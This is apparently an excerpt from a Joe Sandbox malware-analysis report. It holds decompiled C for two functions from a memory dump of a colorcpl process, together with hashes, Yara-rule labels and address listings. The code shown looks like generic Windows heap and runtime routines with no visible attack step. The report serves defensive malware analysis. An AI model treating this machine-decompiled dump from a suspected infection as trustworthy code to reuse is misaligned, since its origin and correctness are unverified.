                                                                                                • Instruction ID: 128798741a4b7190567a2ff4d9dff8dc18c24c6b996a43fa705bf2db1c9db3d6
                                                                                                • Opcode Fuzzy Hash: ea1f64df11345c03254a0bdf0ea8c13923360817a481ea98dccb31031b519ceb
                                                                                                • Instruction Fuzzy Hash: EAB1F431B007159FDB95DBA9C898BBEB7F9AF84304F102169E65AD7381D770DA01CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E2849B Relevance: .3, Instructions: 290COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 93%
                                                                                                			E06E2849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
				void* _t136;
				signed int _t139;
				signed int _t141;
				signed int _t145;
				intOrPtr _t146;
				signed int _t149;
				signed int _t150;
				signed int _t161;
				signed int _t163;
				signed int _t165;
				signed int _t169;
				signed int _t171;
				signed int _t194;
				signed int _t200;
				void* _t201;
				signed int _t204;
				signed int _t206;
				signed int _t210;
				signed int _t214;
				signed int _t215;
				signed int _t218;
				void* _t221;
				signed int _t224;
				signed int _t226;
				intOrPtr _t228;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				void* _t237;
				void* _t238;

				_t236 = __esi;
				_t235 = __edi;
				_t193 = __ebx;
				_push(0x70);
				_push(0x6eef9c0);
				E06E6D0E8(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
				if( *0x6f07b04 == 0) {
					L4:
					goto L5;
				} else {
					_t136 = E06E2CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
					_t236 = 0;
					if(_t136 < 0) {
						 *((intOrPtr*)(_t237 - 0x54)) = 0;
					}
					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
						_t193 =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
						 *(_t237 - 0x68) = _t236;
						 *(_t237 - 0x6c) = _t236;
						_t235 = _t236;
						 *(_t237 - 0x60) = _t236;
						E06E32280( *[fs:0x30], 0x6f08550);
						_t139 =  *0x6f07b04; // 0x2
						__eflags = _t139 - 1;
						if(__eflags != 0) {
							_t200 = 0xc;
							_t201 = _t237 - 0x40;
							_t141 = E06E4F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
							 *(_t237 - 0x44) = _t141;
							__eflags = _t141;
							if(_t141 < 0) {
								L50:
								E06E2FFB0(_t193, _t235, 0x6f08550);
								L5:
								return E06E6D130(_t193, _t235, _t236);
							}
							_push(_t201);
							_t221 = 0x10;
							_t202 =  *(_t237 - 0x40);
							_t145 = E06E11C45( *(_t237 - 0x40), _t221);
							 *(_t237 - 0x44) = _t145;
							__eflags = _t145;
							if(_t145 < 0) {
								goto L50;
							}
							_t146 =  *0x6f07b9c; // 0x0
							_t235 = L06E34620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
							 *(_t237 - 0x60) = _t235;
							__eflags = _t235;
							if(_t235 == 0) {
								_t149 = 0xc0000017;
								 *(_t237 - 0x44) = 0xc0000017;
							} else {
								_t149 =  *(_t237 - 0x44);
							}
							__eflags = _t149;
							if(__eflags >= 0) {
								L8:
								 *(_t237 - 0x64) = _t235;
								_t150 =  *0x6f07b10; // 0x18
								 *(_t237 - 0x4c) = _t150;
								_t193 = E06E4A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags, _t237 - 0x58, _t237 - 0x39, _t237 - 0x74);
								 *(_t237 - 0x44) = _t193;
								__eflags = _t193;
								if(_t193 < 0) {
									L30:
									E06E2FFB0(_t193, _t235, 0x6f08550);
									__eflags = _t235 - _t237 - 0x38;
									if(_t235 != _t237 - 0x38) {
										_t235 =  *(_t237 - 0x48);
										L06E377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
									} else {
										_t235 =  *(_t237 - 0x48);
									}
									__eflags =  *(_t237 - 0x6c);
									if( *(_t237 - 0x6c) != 0) {
										L06E377F0(_t235, _t236,  *(_t237 - 0x6c));
									}
									__eflags = _t193;
									if(_t193 >= 0) {
										goto L4;
									} else {
										goto L5;
									}
								}
								_t204 =  *0x6f07b04; // 0x2
								 *(_t235 + 8) = _t204;
								__eflags =  *((char*)(_t237 - 0x39));
								if( *((char*)(_t237 - 0x39)) != 0) {
									 *(_t235 + 4) = 1;
									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
									_t161 =  *0x6f07b10; // 0x18
									 *(_t237 - 0x4c) = _t161;
								} else {
									 *(_t235 + 4) = _t236;
									 *(_t235 + 0xc) =  *(_t237 - 0x58);
								}
								 *((intOrPtr*)(_t237 - 0x54)) = E06E537C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
								_t224 = _t236;
								 *(_t237 - 0x40) = _t236;
								 *(_t237 - 0x50) = _t236;
								while(1) {
									_t163 =  *(_t235 + 8);
									__eflags = _t224 - _t163;
									if(_t224 >= _t163) {
										break;
									}
									_t228 =  *0x6f07b9c; // 0x0
									_t214 = L06E34620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
									 *(_t237 - 0x78) = _t214;
									__eflags = _t214;
									if(_t214 == 0) {
										L52:
										_t193 = 0xc0000017;
										L19:
										 *(_t237 - 0x44) = _t193;
										L20:
										_t206 =  *(_t237 - 0x40);
										__eflags = _t206;
										if(_t206 == 0) {
											L26:
											__eflags = _t193;
											if(_t193 < 0) {
												E06E537F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) != 0) {
													 *0x6f07b10 =  *0x6f07b10 - 8;
												}
											} else {
												_t169 =  *(_t237 - 0x68);
												__eflags = _t169;
												if(_t169 != 0) {
													 *0x6f07b04 =  *0x6f07b04 - _t169;
												}
											}
											__eflags = _t193;
											if(_t193 >= 0) {
												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
											}
											goto L30;
										}
										_t226 = _t206 * 0xc;
										__eflags = _t226;
										_t194 =  *(_t237 - 0x48);
										do {
											 *(_t237 - 0x40) = _t206 - 1;
											_t226 = _t226 - 0xc;
											 *(_t237 - 0x4c) = _t226;
											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
													__eflags =  *((char*)(_t237 - 0x39));
													if( *((char*)(_t237 - 0x39)) == 0) {
														_t171 = _t210;
													} else {
														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
														L06E377F0(_t194, _t236, _t210 - 8);
														_t171 =  *(_t237 - 0x50);
													}
													L48:
													L06E377F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
													L46:
													_t206 =  *(_t237 - 0x40);
													_t226 =  *(_t237 - 0x4c);
													goto L24;
												}
												 *0x6f07b08 =  *0x6f07b08 + 1;
												goto L24;
											}
											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
											__eflags = _t171;
											if(_t171 != 0) {
												__eflags =  *((char*)(_t237 - 0x39));
												if( *((char*)(_t237 - 0x39)) == 0) {
													goto L48;
												}
												E06E557C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
												goto L46;
											}
											L24:
											__eflags = _t206;
										} while (_t206 != 0);
										_t193 =  *(_t237 - 0x44);
										goto L26;
									}
									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
									 *(_t237 - 0x7c) = _t232;
									 *(_t232 - 4) = _t214;
									 *(_t237 - 4) = _t236;
									E06E5F3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
									_t238 = _t238 + 0xc;
									 *(_t237 - 4) = 0xfffffffe;
									_t215 =  *(_t237 - 0x48);
									__eflags = _t193;
									if(_t193 < 0) {
										L06E377F0(_t215, _t236,  *(_t237 - 0x78));
										goto L20;
									}
									__eflags =  *((char*)(_t237 - 0x39));
									if( *((char*)(_t237 - 0x39)) != 0) {
										_t233 = E06E4A44B( *(_t237 - 0x4c));
										 *(_t237 - 0x50) = _t233;
										__eflags = _t233;
										if(_t233 == 0) {
											L06E377F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
											goto L52;
										}
										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
										L17:
										_t234 =  *(_t237 - 0x40);
										_t218 = _t234 * 0xc;
										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
										 *(_t218 + _t235 + 0x10) = _t236;
										_t224 = _t234 + 1;
										 *(_t237 - 0x40) = _t224;
										 *(_t237 - 0x50) = _t224;
										_t193 =  *(_t237 - 0x44);
										continue;
									}
									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
									goto L17;
								}
								 *_t235 = _t236;
								_t165 = 0x10 + _t163 * 0xc;
								__eflags = _t165;
								_push(_t165);
								_push(_t235);
								_push(0x23);
								_push(0xffffffff);
								_t193 = E06E596C0();
								goto L19;
							} else {
								goto L50;
							}
						}
						_t235 = _t237 - 0x38;
						 *(_t237 - 0x60) = _t235;
						goto L8;
					}
					goto L4;
				}
			}

































                                                                                                0x06e2849b
                                                                                                0x06e2849b
                                                                                                0x06e2849b
                                                                                                0x06e2849b
                                                                                                0x06e2849d
                                                                                                0x06e284a2
                                                                                                0x06e284a7
                                                                                                0x06e284b1
                                                                                                0x06e284d8
                                                                                                0x00000000
                                                                                                0x06e284b3
                                                                                                0x06e284c4
                                                                                                0x06e284c9
                                                                                                0x06e284cd
                                                                                                0x06e284cf
                                                                                                0x06e284cf
                                                                                                0x06e284d6
                                                                                                0x06e284e6
                                                                                                0x06e284e9
                                                                                                0x06e284ec
                                                                                                0x06e284ef
                                                                                                0x06e284f2
                                                                                                0x06e284f4
                                                                                                0x06e284fc
                                                                                                0x06e28501
                                                                                                0x06e28506
                                                                                                0x06e28509
                                                                                                0x06e286e0
                                                                                                0x06e286e5
                                                                                                0x06e286e8
                                                                                                0x06e286ed
                                                                                                0x06e286f0
                                                                                                0x06e286f2
                                                                                                0x06e79afd
                                                                                                0x06e79b02
                                                                                                0x06e284da
                                                                                                0x06e284df
                                                                                                0x06e284df
                                                                                                0x06e286fa
                                                                                                0x06e286fd
                                                                                                0x06e286fe
                                                                                                0x06e28701
                                                                                                0x06e28706
                                                                                                0x06e28709
                                                                                                0x06e2870b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e28711
                                                                                                0x06e28725
                                                                                                0x06e28727
                                                                                                0x06e2872a
                                                                                                0x06e2872c
                                                                                                0x06e79af0
                                                                                                0x06e79af5
                                                                                                0x06e28732
                                                                                                0x06e28732
                                                                                                0x06e28732
                                                                                                0x06e28735
                                                                                                0x06e28737
                                                                                                0x06e28515
                                                                                                0x06e28515
                                                                                                0x06e28518
                                                                                                0x06e2851d
                                                                                                0x06e28537
                                                                                                0x06e28539
                                                                                                0x06e2853c
                                                                                                0x06e2853e
                                                                                                0x06e2868c
                                                                                                0x06e28691
                                                                                                0x06e28699
                                                                                                0x06e2869b
                                                                                                0x06e28744
                                                                                                0x06e28748
                                                                                                0x06e286a1
                                                                                                0x06e286a1
                                                                                                0x06e286a1
                                                                                                0x06e286a4
                                                                                                0x06e286a8
                                                                                                0x06e79bdf
                                                                                                0x06e79bdf
                                                                                                0x06e286ae
                                                                                                0x06e286b0
                                                                                                0x00000000
                                                                                                0x06e286b6
                                                                                                0x00000000
                                                                                                0x06e79be9
                                                                                                0x06e286b0
                                                                                                0x06e28544
                                                                                                0x06e2854a
                                                                                                0x06e2854d
                                                                                                0x06e28551
                                                                                                0x06e2876e
                                                                                                0x06e28778
                                                                                                0x06e2877b
                                                                                                0x06e28780
                                                                                                0x06e28557
                                                                                                0x06e28557
                                                                                                0x06e2855d
                                                                                                0x06e2855d
                                                                                                0x06e2856b
                                                                                                0x06e2856e
                                                                                                0x06e28570
                                                                                                0x06e28573
                                                                                                0x06e28576
                                                                                                0x06e28576
                                                                                                0x06e28579
                                                                                                0x06e2857b
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e28581
                                                                                                0x06e285a0
                                                                                                0x06e285a2
                                                                                                0x06e285a5
                                                                                                0x06e285a7
                                                                                                0x06e79b1b
                                                                                                0x06e79b1b
                                                                                                0x06e2862e
                                                                                                0x06e2862e
                                                                                                0x06e28631
                                                                                                0x06e28631
                                                                                                0x06e28634
                                                                                                0x06e28636
                                                                                                0x06e28669
                                                                                                0x06e28669
                                                                                                0x06e2866b
                                                                                                0x06e79bbf
                                                                                                0x06e79bc4
                                                                                                0x06e79bc8
                                                                                                0x06e79bce
                                                                                                0x06e79bce
                                                                                                0x06e28671
                                                                                                0x06e28671
                                                                                                0x06e28674
                                                                                                0x06e28676
                                                                                                0x06e79bae
                                                                                                0x06e79bae
                                                                                                0x06e28676
                                                                                                0x06e2867c
                                                                                                0x06e2867e
                                                                                                0x06e28688
                                                                                                0x06e28688
                                                                                                0x00000000
                                                                                                0x06e2867e
                                                                                                0x06e28638
                                                                                                0x06e28638
                                                                                                0x06e2863b
                                                                                                0x06e2863e
                                                                                                0x06e2863f
                                                                                                0x06e28642
                                                                                                0x06e28645
                                                                                                0x06e28648
                                                                                                0x06e2864d
                                                                                                0x06e79b69
                                                                                                0x06e79b6e
                                                                                                0x06e79b7b
                                                                                                0x06e79b81
                                                                                                0x06e79b85
                                                                                                0x06e79b89
                                                                                                0x06e79ba7
                                                                                                0x06e79b8b
                                                                                                0x06e79b91
                                                                                                0x06e79b9a
                                                                                                0x06e79b9f
                                                                                                0x06e79b9f
                                                                                                0x06e28788
                                                                                                0x06e2878d
                                                                                                0x06e28763
                                                                                                0x06e28763
                                                                                                0x06e28766
                                                                                                0x00000000
                                                                                                0x06e28766
                                                                                                0x06e79b70
                                                                                                0x00000000
                                                                                                0x06e79b70
                                                                                                0x06e28656
                                                                                                0x06e2865a
                                                                                                0x06e2865c
                                                                                                0x06e28752
                                                                                                0x06e28756
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e2875e
                                                                                                0x00000000
                                                                                                0x06e2875e
                                                                                                0x06e28662
                                                                                                0x06e28662
                                                                                                0x06e28662
                                                                                                0x06e28666
                                                                                                0x00000000
                                                                                                0x06e28666
                                                                                                0x06e285b7
                                                                                                0x06e285b9
                                                                                                0x06e285bc
                                                                                                0x06e285bf
                                                                                                0x06e285cc
                                                                                                0x06e285d1
                                                                                                0x06e285d4
                                                                                                0x06e285db
                                                                                                0x06e285de
                                                                                                0x06e285e0
                                                                                                0x06e79b5f
                                                                                                0x00000000
                                                                                                0x06e79b5f
                                                                                                0x06e285e6
                                                                                                0x06e285ea
                                                                                                0x06e286c3
                                                                                                0x06e286c5
                                                                                                0x06e286c8
                                                                                                0x06e286ca
                                                                                                0x06e79b16
                                                                                                0x00000000
                                                                                                0x06e79b16
                                                                                                0x06e286d6
                                                                                                0x06e285f6
                                                                                                0x06e285f6
                                                                                                0x06e285f9
                                                                                                0x06e28602
                                                                                                0x06e28606
                                                                                                0x06e2860a
                                                                                                0x06e2860b
                                                                                                0x06e2860e
                                                                                                0x06e28611
                                                                                                0x00000000
                                                                                                0x06e28611
                                                                                                0x06e285f3
                                                                                                0x00000000
                                                                                                0x06e285f3
                                                                                                0x06e28619
                                                                                                0x06e2861e
                                                                                                0x06e2861e
                                                                                                0x06e28621
                                                                                                0x06e28622
                                                                                                0x06e28623
                                                                                                0x06e28625
                                                                                                0x06e2862c
                                                                                                0x00000000
                                                                                                0x06e2873d
                                                                                                0x00000000
                                                                                                0x06e2873d
                                                                                                0x06e28737
                                                                                                0x06e2850f
                                                                                                0x06e28512
                                                                                                0x00000000
                                                                                                0x06e28512
                                                                                                0x00000000
                                                                                                0x06e284d6

                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.500567778.0000000006DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DF0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.505086924.0000000006F0B000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.505224906.0000000006F0F000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_6df0000_colorcpl.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID:
                                                                                                • API String ID:
                                                                                                • Opcode ID: 77ab16d0bd8b48119e7b49841e2b8701dc221250d59b138cbae7c48de2065a78
                                                                                                • Instruction ID: f83330e73f26c1f9ea1224caaf226a4f6e6bc3e4719c619c679aca28364fe54e
                                                                                                • Opcode Fuzzy Hash: 77ab16d0bd8b48119e7b49841e2b8701dc221250d59b138cbae7c48de2065a78
                                                                                                • Instruction Fuzzy Hash: D1B170B0E1031ADFDB94DFE8C984AAEBBBAFF44304F105129E515AB345D770A949CB90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 06E4513A Relevance: .3, Instructions: 258COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 67%
                                                                                                			E06E4513A(intOrPtr __ecx, void* __edx) {
				signed int _v8;
				signed char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				char _v63;
				char _v64;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed char* _v92;
				signed int _v100;
				signed int _v104;
				char _v105;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t157;
				signed int _t159;
				signed int _t160;
				unsigned int* _t161;
				intOrPtr _t165;
				signed int _t172;
				signed char* _t181;
				intOrPtr _t189;
				intOrPtr* _t200;
				signed int _t202;
				signed int _t203;
				char _t204;
				signed int _t207;
				signed int _t208;
				void* _t209;
				intOrPtr _t210;
				signed int _t212;
				signed int _t214;
				signed int _t221;
				signed int _t222;
				signed int _t226;
				intOrPtr* _t232;
				signed int _t233;
				signed int _t234;
				intOrPtr _t237;
				intOrPtr _t238;
				intOrPtr _t240;
				void* _t245;
				signed int _t246;
				signed int _t247;
				void* _t248;
				void* _t251;
				void* _t252;
				signed int _t253;
				signed int _t255;
				signed int _t256;

				_t255 = (_t253 & 0xfffffff8) - 0x6c;
				_v8 =  *0x6f0d360 ^ _t255;
				_v32 = _v32 & 0x00000000;
				_t251 = __edx;
				_t237 = __ecx;
				_t212 = 6;
				_t245 =  &_v84;
				_t207 =  *((intOrPtr*)(__ecx + 0x48));
				_v44 =  *((intOrPtr*)(__edx + 0xc8));
				_v48 = __ecx;
				_v36 = _t207;
				_t157 = memset(_t245, 0, _t212 << 2);
				_t256 = _t255 + 0xc;
				_t246 = _t245 + _t212;
				if(_t207 == 2) {
					_t247 =  *(_t237 + 0x60);
					_t208 =  *(_t237 + 0x64);
					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
					_t159 =  *((intOrPtr*)(_t237 + 0x58));
					_v104 = _t159;
					_v76 = _t159;
					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
					_v100 = _t160;
					_v72 = _t160;
					L19:
					_v80 = _t208;
					_v84 = _t247;
					L8:
					_t214 = 0;
					if( *(_t237 + 0x74) > 0) {
						_t82 = _t237 + 0x84; // 0x124
						_t161 = _t82;
						_v92 = _t161;
						while( *_t161 >> 0x1f != 0) {
							_t200 = _v92;
							if( *_t200 == 0x80000000) {
								break;
							}
							_t214 = _t214 + 1;
							_t161 = _t200 + 0x10;
							_v92 = _t161;
							if(_t214 <  *(_t237 + 0x74)) {
								continue;
							}
							goto L9;
						}
						_v88 = _t214 << 4;
						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
						_t165 = 0;
						asm("adc eax, [ecx+edx+0x7c]");
						_v24 = _t165;
						_v28 = _v40;
						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
						_t221 = _v40;
						_v16 =  *_v92;
						_v32 =  &_v28;
						if( *(_t237 + 0x4e) >> 0xf == 0) {
							goto L9;
						}
						_t240 = _v48;
						if( *_v92 != 0x80000000) {
							goto L9;
						}
						 *((intOrPtr*)(_t221 + 8)) = 0;
						 *((intOrPtr*)(_t221 + 0xc)) = 0;
						 *((intOrPtr*)(_t221 + 0x14)) = 0;
						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
						_t226 = 0;
						_t181 = _t251 + 0x66;
						_v88 = 0;
						_v92 = _t181;
						do {
							if( *((char*)(_t181 - 2)) == 0) {
								goto L31;
							}
							_t226 = _v88;
							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
								_t181 = E06E5D0F0(1, _t226 + 0x20, 0);
								_t226 = _v40;
								 *(_t226 + 8) = _t181;
								 *((intOrPtr*)(_t226 + 0xc)) = 0;
								L34:
								if(_v44 == 0) {
									goto L9;
								}
								_t210 = _v44;
								_t127 = _t210 + 0x1c; // 0x1c
								_t249 = _t127;
								E06E32280(_t181, _t127);
								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
								_t185 =  *((intOrPtr*)(_t210 + 0x94));
								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
									L06E377F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
								}
								_t189 = L06E34620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
								if(_t189 != 0) {
									 *((intOrPtr*)(_t189 + 8)) = _v20;
									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
									_t232 =  *((intOrPtr*)(_t210 + 0x94));
									 *_t232 = _t232 + 0x10;
									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
									E06E5F3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
									_t256 = _t256 + 0xc;
								}
								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
								E06E2FFB0(_t210, _t249, _t249);
								_t222 = _v76;
								_t172 = _v80;
								_t208 = _v84;
								_t247 = _v88;
								L10:
								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
								_v44 = _t238;
								if(_t238 != 0) {
									 *0x6f0b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
									_v44();
								}
								_pop(_t248);
								_pop(_t252);
								_pop(_t209);
								return E06E5B640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
							}
							_t181 = _v92;
							L31:
							_t226 = _t226 + 1;
							_t181 =  &(_t181[0x18]);
							_v88 = _t226;
							_v92 = _t181;
						} while (_t226 < 4);
						goto L34;
					}
					L9:
					_t172 = _v104;
					_t222 = _v100;
					goto L10;
				}
				_t247 = _t246 | 0xffffffff;
				_t208 = _t247;
				_v84 = _t247;
				_v80 = _t208;
				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
					_t233 = _v72;
					_v105 = _v64;
					_t202 = _v76;
				} else {
					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
					_v105 = 1;
					if(_v63 <= _t204) {
						_v63 = _t204;
					}
					_t202 = _v76 |  *(_t251 + 0x40);
					_t233 = _v72 |  *(_t251 + 0x44);
					_t247 =  *(_t251 + 0x38);
					_t208 =  *(_t251 + 0x3c);
					_v76 = _t202;
					_v72 = _t233;
					_v84 = _t247;
					_v80 = _t208;
				}
				_v104 = _t202;
				_v100 = _t233;
				if( *((char*)(_t251 + 0xc4)) != 0) {
					_t237 = _v48;
					_v105 = 1;
					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
						_t237 = _v48;
					}
					_t203 = _t202 |  *(_t251 + 0xb8);
					_t234 = _t233 |  *(_t251 + 0xbc);
					_t247 = _t247 &  *(_t251 + 0xb0);
					_t208 = _t208 &  *(_t251 + 0xb4);
					_v104 = _t203;
					_v76 = _t203;
					_v100 = _t234;
					_v72 = _t234;
					_v84 = _t247;
					_v80 = _t208;
				}
				if(_v105 == 0) {
					_v36 = _v36 & 0x00000000;
					_t208 = 0;
					_t247 = 0;
					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
					goto L19;
				} else {
					_v36 = 1;
					goto L8;
				}
			}































































                                                                                                0x06e45142
                                                                                                0x06e4514c
                                                                                                0x06e45150
                                                                                                0x06e45157
                                                                                                0x06e45159
                                                                                                0x06e4515e
                                                                                                0x06e45165
                                                                                                0x06e45169
                                                                                                0x06e4516c
                                                                                                0x06e45172
                                                                                                0x06e45176
                                                                                                0x06e4517a
                                                                                                0x06e4517a
                                                                                                0x06e4517a
                                                                                                0x06e4517f
                                                                                                0x06e86d8b
                                                                                                0x06e86d8e
                                                                                                0x06e86d91
                                                                                                0x06e86d95
                                                                                                0x06e86d98
                                                                                                0x06e86d9c
                                                                                                0x06e86da0
                                                                                                0x06e86da3
                                                                                                0x06e86da7
                                                                                                0x06e86e26
                                                                                                0x06e86e26
                                                                                                0x06e86e2a
                                                                                                0x06e451f9
                                                                                                0x06e451f9
                                                                                                0x06e451fe
                                                                                                0x06e86e33
                                                                                                0x06e86e33
                                                                                                0x06e86e39
                                                                                                0x06e86e3d
                                                                                                0x06e86e46
                                                                                                0x06e86e50
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e86e52
                                                                                                0x06e86e53
                                                                                                0x06e86e56
                                                                                                0x06e86e5d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e86e5f
                                                                                                0x06e86e67
                                                                                                0x06e86e77
                                                                                                0x06e86e7f
                                                                                                0x06e86e80
                                                                                                0x06e86e88
                                                                                                0x06e86e90
                                                                                                0x06e86e9f
                                                                                                0x06e86ea5
                                                                                                0x06e86ea9
                                                                                                0x06e86eb1
                                                                                                0x06e86ebf
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e86ecf
                                                                                                0x06e86ed3
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e86edb
                                                                                                0x06e86ede
                                                                                                0x06e86ee1
                                                                                                0x06e86ee8
                                                                                                0x06e86eeb
                                                                                                0x06e86eed
                                                                                                0x06e86ef0
                                                                                                0x06e86ef4
                                                                                                0x06e86ef8
                                                                                                0x06e86efc
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e86f0d
                                                                                                0x06e86f11
                                                                                                0x06e86f32
                                                                                                0x06e86f37
                                                                                                0x06e86f3b
                                                                                                0x06e86f3e
                                                                                                0x06e86f41
                                                                                                0x06e86f46
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x06e86f4c
                                                                                                0x06e86f50
                                                                                                0x06e86f50
                                                                                                0x06e86f54
                                                                                                0x06e86f62
                                                                                                0x06e86f65
                                                                                                0x06e86f6d
                                                                                                0x06e86f7b
                                                                                                0x06e86f7b
                                                                                                0x06e86f93
                                                                                                0x06e86f98
                                                                                                0x06e86fa0
                                                                                                0x06e86fa6
                                                                                                0x06e86fb3
                                                                                                0x06e86fb6
                                                                                                0x06e86fbf
                                                                                                0x06e86fc1
                                                                                                0x06e86fd5
                                                                                                0x06e86fda
                                                                                                0x06e86fda
                                                                                                0x06e86fdd
                                                                                                0x06e86fe2
                                                                                                0x06e86fe7
                                                                                                0x06e86feb
                                                                                                0x06e86fef
                                                                                                0x06e86ff3
                                                                                                0x06e4520c
                                                                                                0x06e4520c
                                                                                                0x06e4520f
                                                                                                0x06e45215
                                                                                                0x06e45234
                                                                                                0x06e4523a
                                                                                                0x06e4523a
                                                                                                0x06e45244
                                                                                                0x06e45245
                                                                                                0x06e45246
                                                                                                0x06e45251
                                                                                                0x06e45251
                                                                                                0x06e86f13
                                                                                                0x06e86f17
                                                                                                0x06e86f17
                                                                                                0x06e86f18
                                                                                                0x06e86f1b
                                                                                                0x06e86f1f
                                                                                                0x06e86f23
                                                                                                0x00000000
                                                                                                0x06e86f28
                                                                                                0x06e45204
                                                                                                0x06e45204
                                                                                                0x06e45208
                                                                                                0x00000000
                                                                                                0x06e45208
                                                                                                0x06e45185
                                                                                                0x06e45188
                                                                                                0x06e4518a
                                                                                                0x06e4518e
                                                                                                0x06e45195
                                                                                                0x06e86db1
                                                                                                0x06e86db5
                                                                                                0x06e86db9
                                                                                                0x06e4519b
                                                                                                0x06e4519b
                                                                                                0x06e4519e
                                                                                                0x06e451a7
                                                                                                0x06e451a9
                                                                                                0x06e451a9
                                                                                                0x06e451b5
                                                                                                0x06e451b8
                                                                                                0x06e451bb
                                                                                                0x06e451be
                                                                                                0x06e451c1
                                                                                                0x06e451c5
                                                                                                0x06e451c9
                                                                                                0x06e451cd
                                                                                                0x06e451cd
                                                                                                0x06e451d8
                                                                                                0x06e451dc
                                                                                                0x06e451e0
                                                                                                0x06e86dcc
                                                                                                0x06e86dd0
                                                                                                0x06e86dd5
                                                                                                0x06e86ddd
                                                                                                0x06e86de1
                                                                                                0x06e86de1
                                                                                                0x06e86de5
                                                                                                0x06e86deb
                                                                                                0x06e86df1
                                                                                                0x06e86df7
